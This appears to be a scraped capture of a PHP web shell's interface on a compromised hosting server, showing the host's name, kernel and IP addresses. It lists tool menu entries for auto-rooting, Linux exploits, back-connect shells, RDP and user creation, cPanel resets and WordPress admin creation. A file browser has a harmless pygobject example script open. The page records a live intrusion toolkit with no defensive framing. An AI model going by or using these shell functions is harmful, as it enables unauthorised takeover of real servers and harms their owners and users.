Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.156
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
pygobject2-2.28.6 /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
cairo-demo.py
2.52
KB
-rw-r--r--
option.py
861
B
-rw-r--r--
properties.py
592
B
-rw-r--r--
signal.py
853
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : option.py
#!/usr/bin/env python # gnome-python/pygobject/examples/option.py from gobject.option import OptionGroup, OptionParser, make_option group = OptionGroup("example", "OptionGroup Example", "Shows all example options", option_list = [ make_option("--example", action="store_true", dest="example", help="An example option."), ]) parser = OptionParser("NAMES ...", description="A simple gobject.option example.", option_list = [ make_option("--file", "-f", type="filename", action="store", dest="file", help="A filename option"), # ... ]) parser.add_option_group(group) parser.parse_args() print "group: example ", group.values.example print "parser: file", parser.values.file
Close